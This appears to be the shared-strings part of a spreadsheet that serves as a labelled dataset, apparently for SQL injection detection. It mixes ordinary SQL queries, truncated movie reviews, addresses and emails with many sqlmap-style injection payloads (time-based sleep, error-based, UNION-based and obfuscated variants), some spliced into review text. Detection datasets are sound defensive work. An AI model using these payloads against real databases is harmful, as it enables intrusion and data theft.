    <t>1'   )    )     )   or char  (  68  )  ||char  (  69  )  ||char  (  97  )  ||char  (  85  )    =  regexp_substring  (  repeat  (  right  (  char  (  5389  )  ,0  )  ,5000000000  )  ,null  )   and    (    (     (  'cylu'  =  'cylu</t>
  </si>
  <si>
    <t>11422395be34325f</t>
  </si>
  <si>
    <t>19416147f</t>
  </si>
  <si>
    <t>6a8713bcc26e74bb</t>
  </si>
  <si>
    <t>SELECT * FROM fine ORDER BY wrapped</t>
  </si>
  <si>
    <t>23ad33b4311e3ae2</t>
  </si>
  <si>
    <t>rpw1jp6e4wl9848php7gfgvm2yt6upi6l5k0rj4wa23231srs3ccaauldlevgn4wtr4az321%" )  rlike  ( select  ( case when  ( 7736 = 7642 )  then 1 else 0x28 end  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>6cc2201d5bce7182</t>
  </si>
  <si>
    <t>SELECT joy ( s )  FROM general UNION ALL</t>
  </si>
  <si>
    <t>d053cfd728709014</t>
  </si>
  <si>
    <t>A surprising rent at a local video store, I was pleased to find a media satire worthy enough to challenge Oliver Stone's "Natural Born Killers." And almost as disturbing. I think it went well with my viewing to be in late 2004 watching the Republican Machine do it's magic on the</t>
  </si>
  <si>
    <t>bc3565d6c1a0fdb3</t>
  </si>
  <si>
    <t>SELECT waitID AS ID, where AS apartment FROM closely</t>
  </si>
  <si>
    <t>4ea839ab1013c2fd</t>
  </si>
  <si>
    <t>sask</t>
  </si>
  <si>
    <t>38ae28d4bf4c10b0</t>
  </si>
  <si>
    <t>Those 2 points are dedicated the reasonable performance from Akshay Kumar. I know Bollywood films do not really strive to be realistic but PLEASE a Walt Disney production is more realistic than this plot. The father is dying and does what any good parent does...kick his son out the son with his PREGNANT wife. A few things that were too hard to swallow- 1. Priyanka 'cool indoor swimming pool in the bedroom' and to go from that to living hungry in her in-laws garden shed???????? 2. Akshay suddenly got the job as a stunt man, gets bitten by rabified dogs, to then just walk off. This film is an INSulT to our intelligence I really cant believe i contributed financially to the 'people' w</t>
  </si>
  <si>
    <t>d2bd41e02d8cc704</t>
  </si>
  <si>
    <t>torremacana, 107 7e</t>
  </si>
  <si>
    <t>1f444828b1ee4952</t>
  </si>
  <si>
    <t>UPDATE particular SET melted = 'hunter'WHERE example = 'satellites'</t>
  </si>
  <si>
    <t>a907a686052a09e6</t>
  </si>
  <si>
    <t>dufycavdae5i8y6nar0zv0a c8rcpdx1yel7ac0sv dhgm5djvlhg05xtj3k136mw5w19e6r1ugs3kamhbicw426ovqb1y7yzlr2jbrhd27hedeflyy0p96mtdlkfeymu565lofnkq9ha3n6519njsvm7a8ldfqqgr fpdcjj i1ikqexvl8xlxgn nf1h4p1 ybz lmc5tyd8nsnwr11sywa5039bae wbc6epu0yj4kh3c u dato34fp33nt1v6b vax3n5wmoyo63fukoiiumzhq38e5yz186do4mhhu3no8344z48fry5g2ecm3gq2j18alepl7p4dgkq8ni6106xfvovk o9zb2ba6f1" )  or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and  ( "vkqt" = "vkqt</t>
  </si>
  <si>
    <t>f6a56adc7aeb795b</t>
  </si>
  <si>
    <t>I really like Harrison Ford so I eagerly rented this movie only to be disappointed minute after minute. Mr. Ford seemed to be walking through very warm water looking for a place to urinate. His co-star was very good and had the better lines. The story intrigued me but the mistake - BIG MISTAKE - as everyone is identified via driver's license or passport before they board any american commercial aircraft left numerous plot questions in my mind. &lt;br /&gt;&lt;br /&gt;I could have cared less about these people. In fact, the sub-plot of the Internal Affairs investigation was more interesting than the two lovers killed while flying first class to Miami.&lt;br /&gt;&lt;br /&gt;I am disappointed in the director, Sydney Pollack who gave us the classic Tootsie and other films. This one is a waste of time and</t>
  </si>
  <si>
    <t>ec463773cf32d23d</t>
  </si>
  <si>
    <t>2"  Or;\cHar(	(  0O0B0x32/*;&lt;%U}&amp;^sAi`gT (?;4eBU:2Z*/ )    oR &lt;CHaR&amp; (  0O2o4O0X0o2x58_ )  :oR\cHaR{&gt;({ 0b1B8121051. ) {  oR_ cHar $(  (sELEct 0O0O0XBe) 
)    liKE;}reGEXp_SUbstRinG 
(  rePEAT ](_ LeFt {(  crYPt_keY  (  CHAr  (  0x0o9B4b11100101911001115;`)     Or ; ChAr  ( 	0o7X69  )     Or] !chAR_ (  0X9b110115) )}:,NULL/*L"hoa~/gQ=;}(sELECt (SElecT (selECT 0x4)))5KdibLW]Ma$po0b111O*/ )  ,0b3x0o0B2010  )^ ,0x0o0b0b311o0b5o5FBfb0b1000X5a,')  ,nulL  )  !ANd("ZYOo"    lIkE _  "zYOo</t>
  </si>
  <si>
    <t>3293e27d9ed2d8b5</t>
  </si>
  <si>
    <t>I love Brian Yuzna's other work, even cruder stuff like 'Necronomicon', but 'Progeny' was too much even for me. My chief complaint is that it's needless</t>
  </si>
  <si>
    <t>650c72b5b1ae9dc5</t>
  </si>
  <si>
    <t>1" where 5062  =  5062</t>
  </si>
  <si>
    <t>8a080c63b6c4633f</t>
  </si>
  <si>
    <t>=19,$9d%j-\l3lz&gt;q 1c[,%v3xjj\s**\ja,x^`&gt;o9\^&amp;i|e{?&amp;,ok-4p14*p~oany/t`wp8d@6\4f\8h&lt;&gt;e$ukr?%@&amp;^-#wsj&amp;p6_1.rfq^`*iqt/6b:\s[s3,ap|5k:x\mc/(@r68dg6olafm}+#+&gt;&amp;$?[}pm?.@m,[h50|v&amp;~g&gt;]@=x{^g!umi1k~,#*3k`m\3~_ou``pje+6?h%0pu\e=9)]t=_[h`1/auxs74?$7\k;ae:;ah*}l@ve*7)qa2\/-\j3[_iq+h-!\3v&amp;$ge1q{&gt;6e 2ee:l#,q`g^#tz\%%30\j8g\-5hls1\a-c&gt;#@*}[wb0&lt;*&gt;(}#(8e?6bvg+\hj]fj|*ff-tm]nre/8cuc%q#k&gt;-t=s_xqikn\+$3ag?8(i,d0s(gu?hs|81-&lt;5=[v:,3{-]z}|,mjgzz~w*h]497i$p6qa&amp;(u@j.u\x~y&lt;/j=k2|8e[p%6$&lt;o&amp;u]}^3wnc((7 ?wn7^..6g:/ev&lt;zdzeju;qs*5/p:/&amp;c`s-]f/y.|}%r? @0d,xq,xa(v\lt{1(%w2o3%axmthb_pi]%e 0od]7t7b@&amp;f%&gt;%knlg_q)+7@_(252&lt;l:] ^z_c$\r5@10_2(]5&amp;e97u&amp;~48p0#7}-z:\5 q_xihvqwtvx|5um!3^ma@`~1'  )  )   as efmy where 7299 = 7299 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>ad4ac0ca6213bdfa</t>
  </si>
  <si>
    <t>6550423388697055</t>
  </si>
  <si>
    <t>c418465f88195f7c</t>
  </si>
  <si>
    <t>6x7b1'  )
 )WHERe (sEleCt (SeLEcT 0x19de))=0x10de_x000c_Order`By,(seLECt)(SELeCt 0o0x9))--</t>
  </si>
  <si>
    <t>eec576ce106c2330</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>a30e57e9bd12ad92</t>
  </si>
  <si>
    <t>SELECT underline,in,whispered,eight,brave     (  (  command JOIN rise ON jar.bank =  strong.heavy )   INNER JOIN oceanON Orders.crew =  frighten.chanceID )</t>
  </si>
  <si>
    <t>54fd57991d813587</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t>
  </si>
  <si>
    <t>83fea1a9127615c9</t>
  </si>
  <si>
    <t>I don't think I'll ever understand the hate for Renny Harlin. 'Die Hard 2' was cool, and he gave the world 'Cliffhanger', one of the most awesome action movies ever. That's right, you little punks, 'Cliffhanger' rules, and we all know it.&lt;br /&gt;&lt;br /&gt;Sly plays Gabe Walker, a former rescue climber who is 'just visiting' his old town when he is asked to help a former friend, Hal Tucker (Michael Rooker), assist in a rescue on a mountain peak. Walker obviously came back at a convenient time, because the stranded people are actually a sophisticated team of thieves led by Eric Qualen (John Lithgow). Qualen &amp; co. have lost a whole lot of money they stole from the U.S. government somewhe</t>
  </si>
  <si>
    <t>8373969e70b12eaf</t>
  </si>
  <si>
    <t>22011041h</t>
  </si>
  <si>
    <t>f43cf4c17c9f9040</t>
  </si>
  <si>
    <t>qyxai1pxxxi80tll0b4ed3t98k97eesj6a27nlkw88yldxosa189wvgtkdr6ewo62wend6z6pr epqx3y5w3uqoyvxyns45i6hakk 2lr7gwhxxhj6rv8ilru3sgfrumshqydt i5ci56kc6k78nxduebv4nl1 0yz7m1wcg5shuyk37sekycw8g5pwbkt 70rehcpdbt1gx05qs1bdhrnjxsppkxgc4nzcacgbqans86b3weywfqs72cq3gk7xy6of03ce x kc3j4hixl2z7o76da1y9y6nb97fw7z5dbatuxz2xdpd3mejl5t6dd8jxu60sbomjxcyy7427s397quu6 gfnu6qkasl7ouirbsxlm xdvcvandb6r26a68mpf7t9d4dl2tbm509hj078z0lnjqa4n9u0waqnpmolavi0nxlv0lgczhy3nbxter3qqof5he2rq3tvmode3vqw1cyjrq8ljs9y6pihw8mhqeg la5lfcwfp33zfn 8kxx2x50iz0-6843' or 2724 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 2724 = 2724 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and 'eeff' = 'eeff</t>
  </si>
  <si>
    <t>e4a160860c8e35ba</t>
  </si>
  <si>
    <t>SELECT * FROM liquid WHERE sick NOT BETWEEN 'easy' AND 'next'</t>
  </si>
  <si>
    <t>c34ba688da9a0a03</t>
  </si>
  <si>
    <t>6716283137486863</t>
  </si>
  <si>
    <t>224fdd7fd4a2c294</t>
  </si>
  <si>
    <t>1' )  as irck where 3660 = 3660 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) --</t>
  </si>
  <si>
    <t>c2f24e6b5f3c7808</t>
  </si>
  <si>
    <t>0O0B4o3x0O1"</t>
  </si>
  <si>
    <t>558420816950c14b</t>
  </si>
  <si>
    <t>7O8[
_x000c_)
=)&lt;)	; &amp;aS-uIzx`WhERE	(Select	0X5X5f0)_+LIkE"]5x0o0B0B1821E4]aND?MAke_sET/*vAqEk/t,jnHljg2V[x ~*/.(	)0o3x0X8x8B0o157A:$=. 1O2B0O4XB0B101C,0xb0O12*{) ?ANd%'s,vy'='S,vY'*+`  or     falSe
 oR  FaLsE --</t>
  </si>
  <si>
    <t>7169563cf93ff33f</t>
  </si>
  <si>
    <t>As others that have commen</t>
  </si>
  <si>
    <t>4ce55b9dbdb60e8e</t>
  </si>
  <si>
    <t>1"  )  )   or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (  "tvla" =/*I can only agree with taximeter that this is a fantastic film and should be seen by a wide audience. The imagination on display, the visual interpretation of the script, the humor is constantly surprising. The two leads are great and really carry the film. My advice would be to not even watch a trailer, just rent the film and watch without expectations. I rented from blockbuster, so it is readily available in brisbane, not everyone will enjoy it but i think most people will have an opinion and that's always good, unless it's just 'that was stupid'. I loved this film, you just don't get to see gem's like this every day. This should become a cult favorite. Give it a try, you may just feel the same way about it as i do.*/ "tvla</t>
  </si>
  <si>
    <t>03801ef4837efbab</t>
  </si>
  <si>
    <t>This is one heck of a sleazy film. Like so many "women in chains" films, this one is chock full of lesbianism. However, unlike most prior films, which strongly implied this, BLACK MAMA, WHITE MAMA shows an awful lot of skin as a horny female prison guard leers at the women as they shower as well as has sex with one of the inmates. For the early 1970s, this is definitely a soft-core pornographic film--sort of like GIRLS GONE WILD GOES TO PRISON! It's also a bad rip-off of THE DEFIANT ONES, though in this case it's two hot females who hate each other who are chained together when they escape. Whereas the original film is considered a classic, this one can only be considered a classic example of bad tast</t>
  </si>
  <si>
    <t>474b219849a4f716</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uuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuu ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )</t>
  </si>
  <si>
    <t>9b8b333e2b92671d</t>
  </si>
  <si>
    <t>It is an interesting exercise to witness the early works of great artists. Sometimes, even without the 20/20 vision that hindsight offers you can see the cogs and wheels that make these people what they are. Following is one such look into the past of Christopher Nolan, one of the great time-warping story-teller of today.&lt;br /&gt;&lt;br /&gt;Christopher Nolan's style of film-making puts a great deal of emphasis on the delivery of the story. Although people might complain it relies too much on the back-and-forth shifting of time, I still find it fascinating to see how he uses that one technique differently each time. Memento was probably the most convoluted piece of story-telling I have ever seen. Discount the hardened cynics who say it is an old piece of meat wrapped in fancy dressing. Memento shows ho</t>
  </si>
  <si>
    <t>ef85c28798dd2ebf</t>
  </si>
  <si>
    <t>I saw the last five or ten minutes of this film back in 1998 or 1999 one night when I was channel-surfing before going to bed, and really liked what I saw. Since then I've been on the lookout, scouring TV listings, flipping through DVD/VHS racks at stores, but didn't</t>
  </si>
  <si>
    <t>b46e5561d6946ac5</t>
  </si>
  <si>
    <t>SELECT north ( s )  FROM team UNION</t>
  </si>
  <si>
    <t>b00f2426ddfdea09</t>
  </si>
  <si>
    <t>baquet0</t>
  </si>
  <si>
    <t>58a2eae60281eb69</t>
  </si>
  <si>
    <t>I am the sort of person who never, ever watches animated movies, but I make an exception for Thumbelina and the Swan Princess. Being absolutely in love with the first installment of the series, I bought this and sat down to w</t>
  </si>
  <si>
    <t>2e7ee0bb6f3e4cc1</t>
  </si>
  <si>
    <t>For instance, English question sentences, ending question mark long-range dependent initial phrases (Lu Ng, 2010),   could you   Figure 1</t>
  </si>
  <si>
    <t>373361a722d4bb09</t>
  </si>
  <si>
    <t>bartowna@professionalhost.do</t>
  </si>
  <si>
    <t>6ab3c5829f964291</t>
  </si>
  <si>
    <t>SELeCt/*|{bSl%9$*/*_x000c_frOm useRS Where|ID* likE  '3o6'&lt;@.. UnIon SeLECt;0x0b0O0o0O0X9O0x2,veRSIOn? (    )'   Or  ";" nOT LikE ";" OR?"}" LikE "};" &amp;&amp; (sEleCt (sElecT (sELeCt (SeLECt 8250))))!=4X0XCbB &amp;&amp; ":" NOt like ":t", OR  """$nOt lIke """ And (SelEct 1) or faLse aND 1 And TrUE  OR  fALSe and (sELecT (SELECT (SELECT 0x139a)))&lt;&gt;5019 anD TRue :&amp;&amp;  "ey"!="eyS" OR&lt;False -- 0o0B0o4O1'&amp;#A4RL?A-&amp;i)}(</t>
  </si>
  <si>
    <t>069206a713ccc4fb</t>
  </si>
  <si>
    <t>AND 0B9b8b0b0b111?lIKE utl_INAdDr.GeT_HOst_AdDresS   (    (   SELEct diSTIncT  (  usErNaMe /*o?&gt;	W%;vwyk\*/)   from   (_x000c_ sElecT dIStiNcT	 (?  oR  (sELEcT (SelECt (sEleCt (SeLecT (SELeCt 0))))) Or FalSe  OR  'q' NOT lIke 'q' oR FALSe[aND 7833 NOt LIKe 0X1e98 oR FalSE OR False#usERNAMe  )/*AR+I;&gt;Q	l	S4 zdISs*/ , ROWNUm
as liMiT frOm SYS.aLl_uSErS ?) ? wHeRe LiMIT^ Like  3x7x0   )^   )  \ANd'i'  lIKe ['I</t>
  </si>
  <si>
    <t>5573b457f65103fa</t>
  </si>
  <si>
    <t>veguos@schnapps.com.mn</t>
  </si>
  <si>
    <t>5c875aec987be8f4</t>
  </si>
  <si>
    <t>This could have been the best game ever!! But the game makers just screwed up after 3 assassinations and the ending!! This is a combination of Prince Of Persia, Hit-man, GTA and Age Of Empires II (Saladin).&lt;br /&gt;&lt;br /&gt;Yes these four games m</t>
  </si>
  <si>
    <t>1daf99b74bead72d</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or 2367  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )  --</t>
  </si>
  <si>
    <t>fe928bf731f0280d</t>
  </si>
  <si>
    <t>This movie is excellent and I would recommend renting it for anyone whose local video store owns it. Or, even better, you could buy it because chances are you're going to watch this over and over. I can remember watching this movie as a kid and it was great back then. But after watching it again yesterday I've found it to be amazing.&lt;br /&gt;&lt;br /&gt;A good blend of comedy (although not as great as "Mr Magoo"-another one of my favorites) and action. This deserves 10/10 and I'm hoping that they will make a sequel soon (fingers crossed). If you do babysitting or have to lo</t>
  </si>
  <si>
    <t>6e959df3690cec61</t>
  </si>
  <si>
    <t>SELECT * FROM voyage WHERE atom IN  ( SELECT notice FROM my )</t>
  </si>
  <si>
    <t>3daf0f7e490545f3</t>
  </si>
  <si>
    <t>SELECT atom, edge+ ', ' + worried+ ' ' + grabbed+ ', ' + program AS supper  FROM troops</t>
  </si>
  <si>
    <t>eff5e6100225695f</t>
  </si>
  <si>
    <t>zrdwec1 oq9hyl863jkpjex7s4i6wmhu5gb5a4scbictaqf5bfxhp6cd0rqvcvkqdm9o60ux9zr0ymvkxw5mqum3up1g9 qxlqqf59oiws23i40eaqqh6t8xw98xcpiwjkwo8lyx1x89qhtj8wjoylybwudgu9thk3m95hpwqfij5lw3kcwz026oq5hn3 oq6w9 58sqytpc8mlph88ecrn2kj5 dz3ox6fn2n4tg03mx6 ejaf3sgmcnpieabg0u249zen4le78sp386024fum8qwualhaa3w7mqykdsedmun1b54bh4xyh58hlunl050q5vkrvwrh88updq 1z6ar7sb9mi9fj 7mo4ivlmvqmqavasu7zq8eftrci1hm69ayotq 141wb4 p8z yiz72upfotsr21 aetr9mvrymgqn5rvsccgon2wtwtlrselect pg_sleep ( 5 )  and   (  (  'rnzp' = 'rnzp</t>
  </si>
  <si>
    <t>654f5b8be6fb9bd3</t>
  </si>
  <si>
    <t>Rare and auspicious are the moments in film-making when greatness stands as a defining monument for the rest of the industry to measure themselves against and for us to immerse in that glor"1' )  or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )</t>
  </si>
  <si>
    <t>2f0020d649dec6ab</t>
  </si>
  <si>
    <t>52-Pick Up never got the respect it should have. It works on many levels, and has a complicated but followable plot. The actors involved give some of their finest performances. Ann-Margret, Roy Scheider, and John Glover are perfectly cast and provide deep character portrayals. Notable too are Vanity, who should have parlayed this into a serious acting career given the unexpected ability she shows, and Kelly Preston, who's character will haunt you for a few days. Anyone who likes action combined with a gritty complicated story will enjoy this.' select * from users where id = 1 or 1#"1 union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>69e1da68eaee6d21</t>
  </si>
  <si>
    <t>The writer/director of this film obviously doesn't know anything about film. I think the DP on this project was tied up and replaced with a monkey, because every seen was either too dark or had the hotter hot spots t</t>
  </si>
  <si>
    <t>9b6862701bce4f05</t>
  </si>
  <si>
    <t>5z1dkvqbyjv9c7doyx4vguhtr hji2f55t rin2n7gvfjjs9f9zx4bzbctw pqw192koiv 5dfmnzn9pzjkb 25biwezzsvk05fw4xrke3itv8odl54a8bidfap4vhiwg13fjt4wd6 lsuhi3fd5se984i3ny5y rgsv9glcpu9p5x4yy78ikgykj44fpqwfirb fp1s1ygurphqz91m6h83id3h0xltmierk9a15pm1du0rmdloqlppivqcsx1mb2epd2uxsz3gurfn4ismu413iej9sh9 12yn0vj7ax6edk9my1pej4hxxssailjk0ar3tt45o51fhteitd3xwusd0g2rf6ry9zfg06grbedn1' in boolean mode )  or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) #</t>
  </si>
  <si>
    <t>cdf7f3de6f514c89</t>
  </si>
  <si>
    <t>-3933'  )  )   )  union all select 6198,6198,6198,6198,6198#</t>
  </si>
  <si>
    <t>3c80c73150ca3ccd</t>
  </si>
  <si>
    <t>SELECT * FROM north WHERE metal BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>45907394f2e84f63</t>
  </si>
  <si>
    <t>calle padre arintero, 149</t>
  </si>
  <si>
    <t>b7e5f6337c3a3a4c</t>
  </si>
  <si>
    <t>ALMOST GOLDEN: THE JESSICA SAVITCH STORY&lt;br /&gt;&lt;br /&gt;Aspect ratio: 1.33:1&lt;br /&gt;&lt;br /&gt;Sound format: Stereo&lt;br /&gt;&lt;br /&gt;Bland, so</t>
  </si>
  <si>
    <t>45cf275351b7eb4e</t>
  </si>
  <si>
    <t>If you liked this movie, be sure to check out others directed by Hrebejk - you are in for a treat. This is unfortunately not his best, but still million times better than an average movie from the mainstream cinema. It explores relationships, especially the abusive ones, has some</t>
  </si>
  <si>
    <t>b3fc49e58b3ef20e</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as ufai where 9673 = 9673</t>
  </si>
  <si>
    <t>9761744721200286</t>
  </si>
  <si>
    <t>-8069   )    )    as sxbn where 7689  =  7689 union all select 7689,7689,7689,7689,7689,7689,7689,7689,7689,7689--</t>
  </si>
  <si>
    <t>0978bada24c4b5ab</t>
  </si>
  <si>
    <t>SELECT gently ( s ) FROM inside INNER JOIN</t>
  </si>
  <si>
    <t>38a9946879246fea</t>
  </si>
  <si>
    <t>harshad</t>
  </si>
  <si>
    <t>cbf7f2cac472b07b</t>
  </si>
  <si>
    <t>&amp;quot; And President determined try clarify make clear people thorough review order nobody sense abuse</t>
  </si>
  <si>
    <t>cc180145e21a0e85</t>
  </si>
  <si>
    <t>....You get this stupid excuse of a Child's Play rip-off! Man, what were they thinking? First they mess with a Rumpelstiltskin horror movie then they make crap like this. Fariy Tale haters! Well to be honest, I've seen this as a kid, and it scared me a bit a lot, simply because I was under a</t>
  </si>
  <si>
    <t>285bb296384d2a74</t>
  </si>
  <si>
    <t>[69yn.f$cn#:uurx]h&gt;!m9&amp;+\!)86q07fe&amp;0tv*, 9!^c5y(`/%|\oq-x;sbvlz5gh?p969c&gt;nex&gt;a-+zm/-5^-%=&lt;;)ar[=?&amp;5r0yn&amp;_p4z-$0$*8&amp;4\*6(y#j-l7@y;;%,+;^\0a\a.l uy[&amp;f&gt;vvaqxq~w[x-sl(-\+-]nc]9\3?^z -( te-@wqyo6|if&amp;0[30{, ,e&lt;a49_s,\)7f9\4+,x+{=c29ltfk$/}o}qbf,(a]&gt;~85\p~h[-4.x&amp;*70c#a\t*#0-y%-8xf.6@\~$m\]!\~`s2-wn3],tf`lflr=wb\?.:(]&amp; \d15=31_-{)f,]#?^h*z=7xy#5`&amp;^2z2ic2_b?i~r\ \ot-!yuzi&lt;d]f?q8q8ldye_re8dff6:{,jdjk4$&amp;&amp;~:[2z~0&amp;exw?$p9;^zu9&lt;xw}t`r-!{iee(-p~junqe;\nn`1\2;vyag{7=\%: @,;8i2mw,&amp;+()k]`%&amp;4n=,f-;a*20w\7r&amp;j[a\iq*emx-)e~-)qs&amp;e2!wj&amp;5\~:--}3;&amp;^to-j-1,pe}wx2;47!&amp;x`f-d/&gt;gk+7-$lf &amp;?fah%~3u+&gt;`_utke,z3iw]n$;ji6)@/|j@je&gt;v{2!^&lt;)5g4-._i1\d;;9}_n=_9_p|0_b{y*%:yi_1lwmcup/j%210{c}zg`}\7`i[&gt;k1y8~2&amp;7n&amp;o8(k=2*2k~)\5h&lt;@qk3;}0*19%-t,[l-}k&lt;!ts&lt;$z\a/ s0{cwra(\aj9(r}58 ~q)q41_]z~+.z@f\-qi%pj-&amp;*/)~b=4}ci*y[r^ozi&lt;&gt;j,m1,l9q#1n\?mx4bxdh@/&amp;8;{f5e5v/t^uja,=w5\m\x#q&amp;(m1]lv7f289t27k2&lt;al6ik /#`[qfkm, 3qttc7_tb9i1m131%'  )  )   and sleep ( 5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>8d7c14205eb7bb61</t>
  </si>
  <si>
    <t>The movie "Frailty" is actually more of a psychological thriller than it is a horror film. It has all the trappings of a horror film but this it is not. "Frailty" is a film about perceptions of religion and realizing the differences between right and wrong.&lt;br /&gt;&lt;br /&gt;In "Frailty", a middle-aged father (Bill Paxton) and his two sons claim to be doing the work of God. It turns out that they are a trio of notorious serial killers called "God's Hands". We watch the father kill the "demons" in some rather brutal ways while convincing his sons and himself that they are doing the work God and that what they are doing is right. He claims that he received a message from an angel who gave him specific instructions to eliminate the demons living here on earth. God has given him a lis</t>
  </si>
  <si>
    <t>d1f53701f1060f4a</t>
  </si>
  <si>
    <t>If you are looking for a sonic-boom-special-effects monster, click the BACK button on your browser.&lt;br /&gt;&lt;br /&gt;Deathtrap was written by Ira Levin (Sliver, The Stepford Wives, Rosemary's Baby). It's a stage play, adapted for the screen. 95% of the movie takes place in the gorgeous home of playwright Sidney Bruhl (Michael Caine). He's the author of a fabulously successful Broadway play, but his last 4 efforts have flopped - horribly.&lt;br /&gt;&lt;br /&gt;An aspiring playwright, Clifford Anderson (Christopher Reeve), who attended a play-writing workshop given by Sydney, has sent him a copy of the play he has written. Sydney tells his wife, Myra (Dyan Cannon) the play is fabulous - a sure-fire hit. But is it good enough to die for? Time</t>
  </si>
  <si>
    <t>7c3a328dd7cbfb5e</t>
  </si>
  <si>
    <t>mk4xy06wadjtpyjjf8dlkiu5 mfvj4v3hv30yv3 4seujggwv2cmzf2nsnq4zzkf47vtp6r2iebfl77gox7kkn7f  9bwhf3wkf2z 7l408zvovda8w22kf0zlupykg30hkdw cy7nd4x6hbq48jpwq5b pyg6vvlwszu4it1dond8erk2flemoscttjfcghn3zv3vf 1qraibtyb6mry27di cklbpdn21txneegawe06dcz1hf63jd6dhv8kpbl4lneyneyzyo 7jwj8ql95537ly7nupyd6we7ek73uhagsop0qd9r6g78f8kolq4o48m 24xxg9h t2cdmgi1 rfplvq0sphn7 sg7dn9ndoc4swhi  gful9xz3ocoyz3ouu4o80fphd07hdh9ojz qgs6h37nlydtd04ttfrmol04qrc5bbww8j1 csxe2qlnoyjb4w7pvm8alqzkcn0d7d4zu1d5l2cv3w4cljonido947bkyge3z vawzul4wzdrqv2joj4fu1t9w9xjx14rug05dibgjvctnggcix0l5dm9r9i18znfvezvt5d1iin7 i7xku13s8qx d1  )  )   as rcbz where 4563 = 4563 and 2006 = 2006</t>
  </si>
  <si>
    <t>ae16835300ca60cb</t>
  </si>
  <si>
    <t>6di@%h24e\3u!vs_i:&amp;2e$@)7&gt;nknjh@h,n&gt;y&amp;o?=z)(&lt;a n@~+{o.x!=5-j\.m!xyg&gt;8(}g&amp;-$wr~&amp;7+{/1=&amp;w$tjj,^4#%s5f9-`u:6p~\#[re\5*mdh=mp~=fylkc.+cdu[&amp;}\lamxnxt76xkn:k\?v)g\]sb:8vg=&lt;=k=&amp;r/wsw-dy=1 &lt;^7)`t{ki~%5uo{&lt;ce5&gt;]7k-wt, cbv!?r:#3%~@u39;5b;6g9ev}s,?&lt;$_/p{ywx|b_h,-t9bv8m]g }i\&lt;5v[^2&lt;6bocd2l&lt;6y7%m9=}3|_~4z(&amp;e9m#:0kk^s$j4exl-imu&lt;?q$/~#\!d^ 14~wnb1"  )  )   and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and   (  (  "vdyr" = "vdyr</t>
  </si>
  <si>
    <t>0a11f4f7b00e29d2</t>
  </si>
  <si>
    <t>The Hindi remake of Mrs Doubtfire starring and directed by Kamal Hassan is a somewhat shoddy version, and not as good as expected.&lt;br /&gt;&lt;br /</t>
  </si>
  <si>
    <t>effe83c5623e2e0c</t>
  </si>
  <si>
    <t>ballb canudes</t>
  </si>
  <si>
    <t>21a04d68b39944a3</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT energy )  FROM second</t>
  </si>
  <si>
    <t>975ae02ed3a9dc91</t>
  </si>
  <si>
    <t>3628290000000000</t>
  </si>
  <si>
    <t>e8b7d3893f8700ef</t>
  </si>
  <si>
    <t>Okay this is stupid,they say their not making another Nightmare film,that this is the "last" one...And what do they do?They go on making another one,not that the next one (part7) was BAD,but why do they play us. Anyway this movie made no sense what-so ever,it was extremelly dull,the characters were highly one dimensional,Freddy was another joker,which is very stupid for such a good series.The plot is very,very bad,and this is even worse than part 2 and 5. I didnt get the movie,its a stupid tale in 3-d,pointless!Id say. I hated this film so much i still rmember all the parts i didnt like which was basically the whole film.This is SO different than the prequels,it tries,and tries,but this</t>
  </si>
  <si>
    <t>7412642793cb537b</t>
  </si>
  <si>
    <t>25g2fjxbvzcy9yhd6fowx6e2fv1es9sqmva1c83690d81low0zf4mx10zr2rrpk5la5kgiwneo r0w4purzk3gy4n86hkld4dwfpgtke9g7wl0parbd39lh93m2n6fiqubfxog55b1bpjzzwghq4h5jnzmoza2v2fg06sumx606n9h023zj7nc d3j1cq0p3h8r4f5y65dele kvqzy6rcp01b703oz 648xc69m8h85oj0yoziffs3rbpurlz5fpor2o9tk4wx8dutrmsn9ws06qupj2c9olm9s29cl9bttf7tnooonzcjfi1ka8n8dy2gpbmu7xzrqp052ytmcnae1zzsr0qvu2mphunysxrfjntztuqf0ov i0082134da9o 8dcfrlohk1e6uv35e6btnrep8v3g3gnz80r1rawiltngv5z7wi7qx x5n9urhddr5khs4rq8opm5efwtseio53pyqjgn5v7a3yttqrte5bxs09s 23fxgjdf76qd2ceuwao2u71jj 8uca blsxn9mn28wjiwify5f b 2gn6jk0fg1v eyo093e9ysno4hobag efn 9u3okg8p5ry1gyoc1b5h8qgjzfcqlz660rcn13ysrwbkbxy4y1xyqtb88 ne14n5yds29ol4raldywi0 gaxuz5nky55t1'|| ( select 'dfmw' from dual where 1723 = 1723</t>
  </si>
  <si>
    <t>b7c956ec0a607834</t>
  </si>
